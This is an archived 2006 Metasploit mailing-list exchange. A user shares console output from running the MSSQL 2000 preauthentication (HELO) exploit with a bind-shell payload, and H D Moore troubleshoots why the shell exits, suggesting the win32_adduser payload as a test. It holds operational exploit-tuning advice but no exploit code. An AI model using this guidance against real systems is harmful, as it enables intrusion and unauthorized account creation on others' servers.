Metasploit mailing list archives
Exploit MSSQL HELO vuln
From: hdm at metasploit.com (H D Moore)
Date: Wed, 5 Apr 2006 02:19:10 -0500
Interesting, it looks like the payload is unable to execute 'cmd.exe', so the payload connects, but immediately exits. Can you try using the "win32_adduser" payload and see if a new user has been created? It also calls "cmd.exe", so it could be a permission issue or some piece of third-party software blocking the execution. -HD On Tuesday 04 April 2006 22:11, Josh L. Perrymon wrote:
msf mssql2000_preauthentication(win32_bind) > exploit [*] Starting Bind Handler. [*] Saying hello to Microsoft SQL Server 2000 / MSDE 2000 (0x42b68aba / 0x42d01e50) [*] Got connection from 127.0.0.1:2109 <-> 127.0.0.1:33334 [*] Exiting Bind Handler. msf mssql2000_preauthentication(win32_bind) > -------------------------- Does this mean the remote machine has a connection to my local machine? When I try telnetting to 127.0.0.1:33334 it has a blinking cursor then drops the connection???? I haven't used the bind_shell payload before becuase I usually have the ability to put myself outside the firewall when attampting exploits. Thanks for the help... JP
Current thread:
- Exploit MSSQL HELO vuln Josh L. Perrymon (Apr 04)
- Exploit MSSQL HELO vuln H D Moore (Apr 05)